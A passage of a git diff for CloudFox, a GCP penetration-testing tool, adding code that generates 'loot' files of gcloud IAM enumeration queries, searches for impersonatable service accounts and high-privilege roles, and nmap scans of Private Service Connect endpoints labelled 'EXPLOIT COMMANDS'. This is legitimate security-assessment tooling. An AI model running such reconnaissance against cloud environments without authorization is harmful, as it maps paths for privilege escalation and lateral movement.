ok && loot != nil && loot.Contents != "" { + combinedLoot.Contents += fmt.Sprintf("# === Inherited from Folder: %s ===\n", folderID) + lines := strings.Split(loot.Contents, "\n") + for i, line := range lines { + if i >= 2 { + combinedLoot.Contents += line + "\n" + } + } + } + } + + // Add project-level loot + if loot, ok := m.ProjectLoot[projectID]; ok && loot != nil && loot.Contents != "" { + combinedLoot.Contents += fmt.Sprintf("# === Project: %s ===\n", projectID) + lines := strings.Split(loot.Contents, "\n") + for i, line := range lines { + if i >= 2 { + combinedLoot.Contents += line + "\n" + } + } + } + + // 
Only add if there's actual content beyond the header + if len(combinedLoot.Contents) > 50 { + lootFiles = append(lootFiles, *combinedLoot) + } + + return lootFiles +} + +// generateEnumerationLoot generates commands to enumerate permissions +func (m *PermissionsModule) generateEnumerationLoot() { + loot := m.EnumLoot + + // Add organization-level enumeration commands + for _, orgID := range m.OrgIDs { + orgName := m.OrgNames[orgID] + loot.Contents += fmt.Sprintf("# =============================================================================\n") + loot.Contents += fmt.Sprintf("# Organization: %s (%s)\n", orgName, orgID) + loot.Contents += fmt.Sprintf("# =============================================================================\n\n") + + loot.Contents += fmt.Sprintf("# List all IAM bindings for organization\n") + loot.Contents += fmt.Sprintf("gcloud organizations get-iam-policy %s --format=json\n\n", orgID) + + loot.Contents += fmt.Sprintf("# List all roles and their members at organization level\n") + loot.Contents += fmt.Sprintf("gcloud organizations get-iam-policy %s --format=json | jq -r '.bindings[] | \"Role: \\(.role)\\nMembers: \\(.members | join(\", \"))\\n\"'\n\n", orgID) + + loot.Contents += fmt.Sprintf("# Get permissions for a specific role (replace ROLE_NAME)\n") + loot.Contents += fmt.Sprintf("gcloud iam roles describe ROLE_NAME --format=json | jq -r '.includedPermissions[]'\n\n") + } + + // Add project-level enumeration commands + for _, projectID := range m.ProjectIDs { + projectName := m.GetProjectName(projectID) + loot.Contents += fmt.Sprintf("# =============================================================================\n") + loot.Contents += fmt.Sprintf("# Project: %s (%s)\n", projectName, projectID) + loot.Contents += fmt.Sprintf("# =============================================================================\n\n") + + loot.Contents += fmt.Sprintf("# List all IAM bindings for project\n") + loot.Contents += fmt.Sprintf("gcloud projects 
get-iam-policy %s --format=json\n\n", projectID) + + loot.Contents += fmt.Sprintf("# List all roles and their members at project level\n") + loot.Contents += fmt.Sprintf("gcloud projects get-iam-policy %s --format=json | jq -r '.bindings[] | \"Role: \\(.role)\\nMembers: \\(.members | join(\", \"))\\n\"'\n\n", projectID) + + loot.Contents += fmt.Sprintf("# Find all entities with a specific role (replace ROLE_NAME, e.g., roles/owner)\n") + loot.Contents += fmt.Sprintf("gcloud projects get-iam-policy %s --format=json | jq -r '.bindings[] | select(.role == \"ROLE_NAME\") | .members[]'\n\n", projectID) + + loot.Contents += fmt.Sprintf("# Get all roles for a specific entity (replace ENTITY, e.g., user:email@example.com)\n") + loot.Contents += fmt.Sprintf("gcloud projects get-iam-policy %s --format=json | jq -r '.bindings[] | select(.members[] | contains(\"ENTITY\")) | .role'\n\n", projectID) + + loot.Contents += fmt.Sprintf("# List all service accounts and their IAM policy\n") + loot.Contents += fmt.Sprintf("for sa in $(gcloud iam service-accounts list --project=%s --format='value(email)'); do echo \"=== $sa ===\"; gcloud iam service-accounts get-iam-policy $sa --project=%s --format=json 2>/dev/null | jq -r '.bindings[] | \"\\(.role): \\(.members | join(\", \"))\"' 2>/dev/null || echo \"No IAM policy\"; done\n\n", projectID, projectID) + + loot.Contents += fmt.Sprintf("# List all custom roles with their permissions\n") + loot.Contents += fmt.Sprintf("for role in $(gcloud iam roles list --project=%s --format='value(name)'); do echo \"=== $role ===\"; gcloud iam roles describe $role --project=%s --format=json | jq -r '.includedPermissions[]' 2>/dev/null; done\n\n", projectID, projectID) + + loot.Contents += fmt.Sprintf("# Get permissions for a predefined role\n") + loot.Contents += fmt.Sprintf("gcloud iam roles describe roles/editor --format=json | jq -r '.includedPermissions[]'\n\n") + } + + // Add entity-specific enumeration based on discovered permissions + 
loot.Contents += fmt.Sprintf("# =============================================================================\n") + loot.Contents += fmt.Sprintf("# Entity-Specific Permission Enumeration\n") + loot.Contents += fmt.Sprintf("# =============================================================================\n\n") + + // Collect unique entities with their roles + entityRoles := make(map[string]map[string]bool) // entity -> set of roles + entityTypes := make(map[string]string) // entity -> type + + allPerms := m.getAllExplodedPerms() + for _, ep := range allPerms { + if ep.EntityEmail == "" { + continue + } + if entityRoles[ep.EntityEmail] == nil { + entityRoles[ep.EntityEmail] = make(map[string]bool) + } + entityRoles[ep.EntityEmail][ep.Role] = true + entityTypes[ep.EntityEmail] = ep.EntityType + } + + // Generate commands for each entity type + for entity, roles := range entityRoles { + entityType := entityTypes[entity] + + // Convert roles set to slice + var roleList []string + for role := range roles { + roleList = append(roleList, role) + } + sort.Strings(roleList) + + switch entityType { + case "ServiceAccount": + loot.Contents += fmt.Sprintf("# Service Account: %s\n", entity) + loot.Contents += fmt.Sprintf("# Current Roles: %s\n", strings.Join(roleList, ", ")) + + // Extract project from SA email + saProject := "" + parts := strings.Split(entity, "@") + if len(parts) == 2 { + saParts := strings.Split(parts[1], ".") + if len(saParts) >= 1 { + saProject = saParts[0] + } + } + + if saProject != "" { + loot.Contents += fmt.Sprintf("# Describe service account\n") + loot.Contents += fmt.Sprintf("gcloud iam service-accounts describe %s --project=%s --format=json\n", entity, saProject) + + loot.Contents += fmt.Sprintf("# Get IAM policy on the service account itself\n") + loot.Contents += fmt.Sprintf("gcloud iam service-accounts get-iam-policy %s --project=%s --format=json\n", entity, saProject) + } + + loot.Contents += fmt.Sprintf("# Get all permissions for each role\n") + 
for _, role := range roleList { + if strings.HasPrefix(role, "projects/") || strings.HasPrefix(role, "organizations/") { + // Custom role - need to describe with full path + loot.Contents += fmt.Sprintf("gcloud iam roles describe %s --format=json | jq -r '.includedPermissions[]'\n", role) + } else { + loot.Contents += fmt.Sprintf("gcloud iam roles describe %s --format=json | jq -r '.includedPermissions[]'\n", role) + } + } + loot.Contents += "\n" + + case "User": + loot.Contents += fmt.Sprintf("# User: %s\n", entity) + loot.Contents += fmt.Sprintf("# Current Roles: %s\n", strings.Join(roleList, ", ")) + + loot.Contents += fmt.Sprintf("# Get all permissions for each role\n") + for _, role := range roleList { + if strings.HasPrefix(role, "projects/") || strings.HasPrefix(role, "organizations/") { + loot.Contents += fmt.Sprintf("gcloud iam roles describe %s --format=json | jq -r '.includedPermissions[]'\n", role) + } else { + loot.Contents += fmt.Sprintf("gcloud iam roles describe %s --format=json | jq -r '.includedPermissions[]'\n", role) + } + } + loot.Contents += "\n" + + case "Group": + loot.Contents += fmt.Sprintf("# Group: %s\n", entity) + loot.Contents += fmt.Sprintf("# Current Roles: %s\n", strings.Join(roleList, ", ")) + + loot.Contents += fmt.Sprintf("# Get all permissions for each role\n") + for _, role := range roleList { + if strings.HasPrefix(role, "projects/") || strings.HasPrefix(role, "organizations/") { + loot.Contents += fmt.Sprintf("gcloud iam roles describe %s --format=json | jq -r '.includedPermissions[]'\n", role) + } else { + loot.Contents += fmt.Sprintf("gcloud iam roles describe %s --format=json | jq -r '.includedPermissions[]'\n", role) + } + } + loot.Contents += "\n" + } + } + + // Add high-privilege permission search commands + loot.Contents += fmt.Sprintf("# =============================================================================\n") + loot.Contents += fmt.Sprintf("# High-Privilege Permission Search\n") + loot.Contents += 
fmt.Sprintf("# =============================================================================\n\n") + + loot.Contents += fmt.Sprintf("# Find entities with setIamPolicy permissions\n") + for _, projectID := range m.ProjectIDs { + loot.Contents += fmt.Sprintf("gcloud projects get-iam-policy %s --format=json | jq -r '.bindings[] | select(.role | test(\"admin|owner|editor\"; \"i\")) | \"\\(.role): \\(.members | join(\", \"))\"'\n", projectID) + } + loot.Contents += "\n" + + loot.Contents += fmt.Sprintf("# Find service accounts that can be impersonated\n") + for _, projectID := range m.ProjectIDs { + loot.Contents += fmt.Sprintf("gcloud projects get-iam-policy %s --format=json | jq -r '.bindings[] | select(.role | test(\"serviceAccountUser|serviceAccountTokenCreator\"; \"i\")) | \"\\(.role): \\(.members | join(\", \"))\"'\n", projectID) + } + loot.Contents += "\n" +} + +// PermFederatedIdentityInfo contains parsed information about a federated identity +type PermFederatedIdentityInfo struct { + IsFederated bool + ProviderType string // AWS, GitHub, GitLab, OIDC, SAML, Azure, etc. 
+ PoolName string + Subject string + Attribute string +} + +// parsePermFederatedIdentity detects and parses federated identity principals +func parsePermFederatedIdentity(identity string) PermFederatedIdentityInfo { + info := PermFederatedIdentityInfo{} + + // Check for principal:// or principalSet:// format + if !strings.HasPrefix(identity, "principal://") && !strings.HasPrefix(identity, "principalSet://") { + return info + } + + info.IsFederated = true + + // Extract pool name if present + if strings.Contains(identity, "workloadIdentityPools/") { + parts := strings.Split(identity, "workloadIdentityPools/") + if len(parts) > 1 { + poolParts := strings.Split(parts[1], "/") + if len(poolParts) > 0 { + info.PoolName = poolParts[0] + } + } + } + + // Detect provider type based on common patterns + identityLower := strings.ToLower(identity) + + switch { + case strings.Contains(identityLower, "aws") || strings.Contains(identityLower, "amazon"): + info.ProviderType = "AWS" + case strings.Contains(identityLower, "github"): + info.ProviderType = "GitHub" + case strings.Contains(identityLower, "gitlab"): + info.ProviderType = "GitLab" + case strings.Contains(identityLower, "azure") || strings.Contains(identityLower, "microsoft"): + info.ProviderType = "Azure" + case strings.Contains(identityLower, "okta"): + info.ProviderType = "Okta" + case strings.Contains(identityLower, "bitbucket"): + info.ProviderType = "Bitbucket" + case strings.Contains(identityLower, "circleci"): + info.ProviderType = "CircleCI" + case strings.Contains(identity, "attribute."): + info.ProviderType = "OIDC" + default: + info.ProviderType = "Federated" + } + + // Extract subject if present + // Format: .../subject/{subject} + if strings.Contains(identity, "/subject/") { + parts := strings.Split(identity, "/subject/") + if len(parts) > 1 { + info.Subject = parts[1] + } + } + + // Extract attribute and value if present + // Format: .../attribute.{attr}/{value} + if strings.Contains(identity, 
"/attribute.") { + parts := strings.Split(identity, "/attribute.") + if len(parts) > 1 { + attrParts := strings.Split(parts[1], "/") + if len(attrParts) >= 1 { + info.Attribute = attrParts[0] + } + if len(attrParts) >= 2 { + // The value is the specific identity (e.g., repo name) + info.Subject = attrParts[1] + } + } + } + + return info +} + +// formatPermFederatedInfo formats federated identity info for display +func formatPermFederatedInfo(info PermFederatedIdentityInfo) string { + if !info.IsFederated { + return "-" + } + + result := info.ProviderType + + // Show subject (specific identity like repo/workflow) if available + if info.Subject != "" { + result += ": " + info.Subject + } else if info.Attribute != "" { + result += " [" + info.Attribute + "]" + } + + // Add pool name in parentheses + if info.PoolName != "" { + result += " (pool: " + info.PoolName + ")" + } + + return result +} + +// formatCondition formats a condition for display +func formatPermissionCondition(hasCondition bool, condition, conditionTitle string) string { + if !hasCondition { + return "No" + } + + if conditionTitle != "" { + return conditionTitle + } + + // Parse common patterns + if strings.Contains(condition, "request.time") { + return "[time-limited]" + } + if strings.Contains(condition, "resource.name") { + return "[resource-scoped]" + } + if strings.Contains(condition, "origin.ip") || strings.Contains(condition, "request.origin") { + return "[IP-restricted]" + } + if strings.Contains(condition, "device") { + return "[device-policy]" + } + + return "Yes" +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *PermissionsModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Log findings first + allPerms := m.getAllExplodedPerms() + highPrivCount := 0 + crossProjectCount := 0 + for _, ep := range allPerms { + if ep.IsHighPrivilege { + highPrivCount++ + } + if ep.IsCrossProject { + crossProjectCount++ + } + } + + if 
highPrivCount > 0 { + logger.InfoM(fmt.Sprintf("[FINDING] Found %d high-privilege permission entries!", highPrivCount), globals.GCP_PERMISSIONS_MODULE_NAME) + } + if crossProjectCount > 0 { + logger.InfoM(fmt.Sprintf("[FINDING] Found %d cross-project permission entries!", crossProjectCount), globals.GCP_PERMISSIONS_MODULE_NAME) + } + + // Decide between hierarchical and flat output + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +// writeHierarchicalOutput writes output to per-project directories +func (m *PermissionsModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + header := m.getTableHeader() + + // Determine org ID - prefer discovered orgs, fall back to hierarchy + orgID := "" + if len(m.OrgIDs) > 0 { + orgID = m.OrgIDs[0] + } else if m.Hierarchy != nil && len(m.Hierarchy.Organizations) > 0 { + orgID = m.Hierarchy.Organizations[0].ID + } + + // Collect all loot files for org-level output + allLootFiles := m.collectAllLootFiles() + + // Get all permissions for output + allPerms := m.getAllExplodedPerms() + + // Check if we should use single-pass tee streaming for large datasets + if orgID != "" && len(allPerms) >= 50000 { + m.writeHierarchicalOutputTee(ctx, logger, orgID, header, allPerms, allLootFiles) + return + } + + // Standard output path for smaller datasets + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + if orgID != "" { + // DUAL OUTPUT: Complete aggregated output at org level + body := m.permsToTableBody(allPerms) + tables := []internal.TableFile{{ + Name: "permissions", + Header: header, + Body: body, + }} + outputData.OrgLevelData[orgID] = PermissionsOutput{Table: tables, Loot: allLootFiles} + + // DUAL OUTPUT: Filtered per-project output with inherited loot + for projectID, perms := range m.ProjectPerms { + 
if len(perms) == 0 { + continue + } + body := m.permsToTableBody(perms) + tables := []internal.TableFile{{ + Name: "permissions", + Header: header, + Body: body, + }} + // Get loot for this project with inheritance (org + folders + project) + projectLoot := m.collectLootFilesForProject(projectID) + outputData.ProjectLevelData[projectID] = PermissionsOutput{Table: tables, Loot: projectLoot} + } + } else if len(m.ProjectIDs) > 0 { + // FALLBACK: No org discovered, output complete data to first project + body := m.permsToTableBody(allPerms) + tables := []internal.TableFile{{ + Name: "permissions", + Header: header, + Body: body, + }} + outputData.ProjectLevelData[m.ProjectIDs[0]] = PermissionsOutput{Table: tables, Loot: allLootFiles} + } + + // Create path builder using the module's hierarchy + pathBuilder := m.BuildPathBuilder() + + // Write using hierarchical output + err := internal.HandleHierarchicalOutputSmart( + "gcp", + m.Format, + m.Verbosity, + m.WrapTable, + pathBuilder, + outputData, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_PERMISSIONS_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +// writeHierarchicalOutputTee uses single-pass streaming for large datasets. +// It streams through all permissions once, writing each row to: +// 1. The org-level output (always) +// 2. 
The appropriate project-level output based on EffectiveProject +func (m *PermissionsModule) writeHierarchicalOutputTee(ctx context.Context, logger internal.Logger, orgID string, header []string, allPerms []ExplodedPermission, lootFiles []internal.LootFile) { + logger.InfoM(fmt.Sprintf("Using single-pass tee streaming for %d permissions", len(allPerms)), globals.GCP_PERMISSIONS_MODULE_NAME) + + pathBuilder := m.BuildPathBuilder() + + // Build the table data + body := m.permsToTableBody(allPerms) + tables := []internal.TableFile{{ + Name: "permissions", + Header: header, + Body: body, + }} + + // Build reverse lookup: for each folder, which projects are under it + // This allows O(1) lookup during row routing + folderToProjects := make(map[string][]string) + orgToProjects := make(map[string][]string) + + if m.OrgCache != nil && m.OrgCache.IsPopulated() { + for _, projectID := range m.ProjectIDs { + // Get the org this project belongs to + projectOrgID := m.OrgCache.GetProjectOrgID(projectID) + if projectOrgID != "" { + orgToProjects[projectOrgID] = append(orgToProjects[projectOrgID], projectID) + } + + // Get all ancestor folders for this project + ancestorFolders := m.OrgCache.GetProjectAncestorFolders(projectID) + for _, folderID := range ancestorFolders { + folderToProjects[folderID] = append(folderToProjects[folderID], projectID) + } + } + } + + // Create a row router that routes based on scope type and OrgCache + rowRouter := func(row []string) []string { + // Row format: [ScopeType, ScopeID, ScopeName, EntityType, Identity, Permission, ...] 
+ scopeType := row[0] + scopeID := row[1] + + switch scopeType { + case "project": + // Direct project permission - route to that project only + return []string{scopeID} + case "organization": + // Org permission - route to all projects under this org + if projects, ok := orgToProjects[scopeID]; ok { + return projects + } + // Fallback if OrgCache not populated: route to all projects + return m.ProjectIDs + case "folder": + // Folder permission - route to all projects under this folder + if projects, ok := folderToProjects[scopeID]; ok { + return projects + } + // Fallback if folder not in cache: route to all projects + return m.ProjectIDs + default: + return nil + } + } + + // Use the tee streaming function + config := internal.TeeStreamingConfig{ + OrgID: orgID, + ProjectIDs: m.ProjectIDs, + Tables: tables, + LootFiles: lootFiles, + ProjectLootCollector: m.collectLootFilesForProject, + RowRouter: rowRouter, + PathBuilder: pathBuilder, + Format: m.Format, + Verbosity: m.Verbosity, + Wrap: m.WrapTable, + } + + err := internal.HandleHierarchicalOutputTee(config) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing tee streaming output: %v", err), globals.GCP_PERMISSIONS_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +// writeFlatOutput writes all output to a single directory (legacy mode) +func (m *PermissionsModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + header := m.getTableHeader() + allPerms := m.getAllExplodedPerms() + body := m.permsToTableBody(allPerms) + + // Sort by scope type (org first, then folder, then project), then entity, then permission + scopeOrder := map[string]int{"organization": 0, "folder": 1, "project": 2} + sort.Slice(body, func(i, j int) bool { + if body[i][0] != body[j][0] { + return scopeOrder[body[i][0]] < scopeOrder[body[j][0]] + } + if body[i][4] != body[j][4] { + return body[i][4] < body[j][4] + } + return body[i][5] < body[j][5] + }) + + // Collect all loot files for flat output + lootFiles := 
m.collectAllLootFiles() + + tables := []internal.TableFile{{ + Name: "permissions", + Header: header, + Body: body, + }} + + output := PermissionsOutput{ + Table: tables, + Loot: lootFiles, + } + + // Determine output scope - use org if available, otherwise fall back to project + var scopeType string + var scopeIdentifiers []string + var scopeNames []string + + if len(m.OrgIDs) > 0 { + scopeType = "organization" + for _, orgID := range m.OrgIDs { + scopeIdentifiers = append(scopeIdentifiers, orgID) + if name, ok := m.OrgNames[orgID]; ok && name != "" { + scopeNames = append(scopeNames, name) + } else { + scopeNames = append(scopeNames, orgID) + } + } + } else { + scopeType = "project" + scopeIdentifiers = m.ProjectIDs + for _, id := range m.ProjectIDs { + scopeNames = append(scopeNames, m.GetProjectName(id)) + } + } + + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + scopeType, + scopeIdentifiers, + scopeNames, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_PERMISSIONS_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +// getTableHeader returns the permissions table header +func (m *PermissionsModule) getTableHeader() []string { + return []string{ + "Scope Type", + "Scope ID", + "Scope Name", + "Entity Type", + "Identity", + "Permission", + "Role", + "Custom Role", + "Inherited", + "Inherited From", + "Condition", + "Cross-Project", + "High Privilege", + "Federated", + } +} + +// permsToTableBody converts permissions to table body rows +func (m *PermissionsModule) permsToTableBody(perms []ExplodedPermission) [][]string { + var body [][]string + for _, ep := range perms { + isCustom := "No" + if ep.RoleType == "custom" || strings.HasPrefix(ep.Role, "projects/") || strings.HasPrefix(ep.Role, "organizations/") { + isCustom = "Yes" + } + + inherited := "No" + if ep.IsInherited { + inherited = "Yes" + } + + inheritedFrom := "-" + if 
ep.IsInherited && ep.InheritedFrom != "" { + inheritedFrom = ep.InheritedFrom + } + + condition := formatPermissionCondition(ep.HasCondition, ep.Condition, ep.ConditionTitle) + + crossProject := "No" + if ep.IsCrossProject { + crossProject = fmt.Sprintf("Yes (from %s)", ep.SourceProject) + } + + highPriv := "No" + if ep.IsHighPrivilege { + highPriv = "Yes" + } + + // Check for federated identity + federated := formatPermFederatedInfo(parsePermFederatedIdentity(ep.EntityEmail)) + + body = append(body, []string{ + ep.ResourceScopeType, + ep.ResourceScopeID, + ep.ResourceScopeName, + ep.EntityType, + ep.EntityEmail, + ep.Permission, + ep.Role, + isCustom, + inherited, + inheritedFrom, + condition, + crossProject, + highPriv, + federated, + }) + } + return body +} diff --git a/gcp/commands/privateserviceconnect.go b/gcp/commands/privateserviceconnect.go new file mode 100644 index 00000000..9a2dca4c --- /dev/null +++ b/gcp/commands/privateserviceconnect.go @@ -0,0 +1,558 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + networkendpointsservice "github.com/BishopFox/cloudfox/gcp/services/networkEndpointsService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPPrivateServiceConnectCommand = &cobra.Command{ + Use: "private-service-connect", + Aliases: []string{"psc", "private-endpoints", "internal-endpoints"}, + Short: "Enumerate Private Service Connect endpoints and service attachments", + Long: `Enumerate Private Service Connect (PSC) endpoints, private connections, and service attachments. + +Private Service Connect allows private connectivity to Google APIs and services, +as well as to services hosted by other organizations. 
+ +Security Relevance: +- PSC endpoints provide internal network paths to external services +- Service attachments expose internal services to other projects +- Private connections (VPC peering for managed services) provide access to Cloud SQL, etc. +- These can be used for lateral movement or data exfiltration + +What this module finds: +- PSC forwarding rules (consumer endpoints) +- Service attachments (producer endpoints) +- Private service connections (e.g., to Cloud SQL private IPs) +- Connection acceptance policies (auto vs manual) + +Output includes nmap commands for scanning internal endpoints.`, + Run: runGCPPrivateServiceConnectCommand, +} + +// ------------------------------ +// Module Struct +// ------------------------------ +type PrivateServiceConnectModule struct { + gcpinternal.BaseGCPModule + + ProjectPSCEndpoints map[string][]networkendpointsservice.PrivateServiceConnectEndpoint // projectID -> endpoints + ProjectPrivateConnections map[string][]networkendpointsservice.PrivateConnection // projectID -> connections + ProjectServiceAttachments map[string][]networkendpointsservice.ServiceAttachment // projectID -> attachments + LootMap map[string]map[string]*internal.LootFile // projectID -> loot files + mu sync.Mutex +} + +// ------------------------------ +// Output Struct +// ------------------------------ +type PrivateServiceConnectOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o PrivateServiceConnectOutput) TableFiles() []internal.TableFile { return o.Table } +func (o PrivateServiceConnectOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPPrivateServiceConnectCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, "private-service-connect") + if err != nil { + return + } + + module := &PrivateServiceConnectModule{ + BaseGCPModule: 
gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectPSCEndpoints: make(map[string][]networkendpointsservice.PrivateServiceConnectEndpoint), + ProjectPrivateConnections: make(map[string][]networkendpointsservice.PrivateConnection), + ProjectServiceAttachments: make(map[string][]networkendpointsservice.ServiceAttachment), + LootMap: make(map[string]map[string]*internal.LootFile), + } + + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *PrivateServiceConnectModule) Execute(ctx context.Context, logger internal.Logger) { + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, "private-service-connect", m.processProject) + + allEndpoints := m.getAllPSCEndpoints() + allConnections := m.getAllPrivateConnections() + allAttachments := m.getAllServiceAttachments() + + totalFindings := len(allEndpoints) + len(allConnections) + len(allAttachments) + + if totalFindings == 0 { + logger.InfoM("No private service connect endpoints found", "private-service-connect") + return + } + + logger.SuccessM(fmt.Sprintf("Found %d PSC endpoint(s), %d private connection(s), %d service attachment(s)", + len(allEndpoints), len(allConnections), len(allAttachments)), "private-service-connect") + + // Count high-risk findings + autoAcceptCount := 0 + for _, sa := range allAttachments { + if sa.ConnectionPreference == "ACCEPT_AUTOMATIC" { + autoAcceptCount++ + } + } + if autoAcceptCount > 0 { + logger.InfoM(fmt.Sprintf("[High] %d service attachment(s) auto-accept connections from any project", autoAcceptCount), "private-service-connect") + } + + m.writeOutput(ctx, logger) +} + +func (m *PrivateServiceConnectModule) getAllPSCEndpoints() []networkendpointsservice.PrivateServiceConnectEndpoint { + var all []networkendpointsservice.PrivateServiceConnectEndpoint + for _, endpoints := range m.ProjectPSCEndpoints { + all = append(all, endpoints...) 
+ } + return all +} + +func (m *PrivateServiceConnectModule) getAllPrivateConnections() []networkendpointsservice.PrivateConnection { + var all []networkendpointsservice.PrivateConnection + for _, conns := range m.ProjectPrivateConnections { + all = append(all, conns...) + } + return all +} + +func (m *PrivateServiceConnectModule) getAllServiceAttachments() []networkendpointsservice.ServiceAttachment { + var all []networkendpointsservice.ServiceAttachment + for _, attachments := range m.ProjectServiceAttachments { + all = append(all, attachments...) + } + return all +} + +// ------------------------------ +// Project Processor +// ------------------------------ +func (m *PrivateServiceConnectModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Checking private service connect in project: %s", projectID), "private-service-connect") + } + + m.mu.Lock() + // Initialize loot for this project + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + m.LootMap[projectID]["private-service-connect-commands"] = &internal.LootFile{ + Name: "private-service-connect-commands", + Contents: "# Private Service Connect Commands\n" + + "# Generated by CloudFox\n" + + "# WARNING: Only use with proper authorization\n" + + "# NOTE: These are internal IPs - you must be on the VPC network to reach them\n\n", + } + } + m.mu.Unlock() + + svc := networkendpointsservice.New() + + // Get PSC endpoints + pscEndpoints, err := svc.GetPrivateServiceConnectEndpoints(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, "private-service-connect", + fmt.Sprintf("Could not get PSC endpoints in project %s", projectID)) + } + + // Get private connections + privateConns, err := svc.GetPrivateConnections(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, 
"private-service-connect", + fmt.Sprintf("Could not get private connections in project %s", projectID)) + } + + // Get service attachments + attachments, err := svc.GetServiceAttachments(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, "private-service-connect", + fmt.Sprintf("Could not get service attachments in project %s", projectID)) + } + + m.mu.Lock() + m.ProjectPSCEndpoints[projectID] = append(m.ProjectPSCEndpoints[projectID], pscEndpoints...) + m.ProjectPrivateConnections[projectID] = append(m.ProjectPrivateConnections[projectID], privateConns...) + m.ProjectServiceAttachments[projectID] = append(m.ProjectServiceAttachments[projectID], attachments...) + + for _, endpoint := range pscEndpoints { + m.addPSCEndpointToLoot(projectID, endpoint) + } + for _, conn := range privateConns { + m.addPrivateConnectionToLoot(projectID, conn) + } + for _, attachment := range attachments { + m.addServiceAttachmentToLoot(projectID, attachment) + } + m.mu.Unlock() +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *PrivateServiceConnectModule) addPSCEndpointToLoot(projectID string, endpoint networkendpointsservice.PrivateServiceConnectEndpoint) { + lootFile := m.LootMap[projectID]["private-service-connect-commands"] + if lootFile == nil { + return + } + lootFile.Contents += fmt.Sprintf( + "# =============================================================================\n"+ + "# PSC ENDPOINT: %s\n"+ + "# =============================================================================\n"+ + "# Project: %s, Region: %s\n"+ + "# Network: %s, Subnet: %s\n"+ + "# Target Type: %s, Target: %s\n"+ + "# State: %s, IP: %s\n\n", + endpoint.Name, endpoint.ProjectID, endpoint.Region, + endpoint.Network, endpoint.Subnetwork, + endpoint.TargetType, endpoint.Target, + endpoint.ConnectionState, endpoint.IPAddress, + ) + + lootFile.Contents += "# === ENUMERATION COMMANDS ===\n\n" + 
lootFile.Contents += fmt.Sprintf( + "# Describe forwarding rule:\n"+ + "gcloud compute forwarding-rules describe %s --region=%s --project=%s\n\n", + endpoint.Name, endpoint.Region, endpoint.ProjectID, + ) + + if endpoint.IPAddress != "" { + lootFile.Contents += "# === EXPLOIT COMMANDS ===\n\n" + lootFile.Contents += fmt.Sprintf( + "# Scan internal endpoint (from within VPC):\n"+ + "nmap -sV -Pn %s\n\n", + endpoint.IPAddress, + ) + } +} + +func (m *PrivateServiceConnectModule) addPrivateConnectionToLoot(projectID string, conn networkendpointsservice.PrivateConnection) { + lootFile := m.LootMap[projectID]["private-service-connect-commands"] + if lootFile == nil { + return + } + reservedRanges := "-" + if len(conn.ReservedRanges) > 0 { + reservedRanges = strings.Join(conn.ReservedRanges, ", ") + } + accessibleServices := "-" + if len(conn.AccessibleServices) > 0 { + accessibleServices = strings.Join(conn.AccessibleServices, ", ") + } + + lootFile.Contents += fmt.Sprintf( + "# =============================================================================\n"+ + "# PRIVATE CONNECTION: %s\n"+ + "# =============================================================================\n"+ + "# Project: %s\n"+ + "# Network: %s, Service: %s\n"+ + "# Peering: %s\n"+ + "# Reserved Ranges: %s\n"+ + "# Accessible Services: %s\n\n", + conn.Name, conn.ProjectID, + conn.Network, conn.Service, + conn.PeeringName, + reservedRanges, + accessibleServices, + ) + + lootFile.Contents += "# === ENUMERATION COMMANDS ===\n\n" + lootFile.Contents += fmt.Sprintf( + "# List private connections:\n"+ + "gcloud services vpc-peerings list --network=%s --project=%s\n\n", + conn.Network, conn.ProjectID, + ) + + // Add nmap commands for each reserved range + if len(conn.ReservedRanges) > 0 { + lootFile.Contents += "# === EXPLOIT COMMANDS ===\n\n" + } + for _, ipRange := range conn.ReservedRanges { + lootFile.Contents += fmt.Sprintf( + "# Scan private connection range (from within VPC):\n"+ + "nmap -sV -Pn 
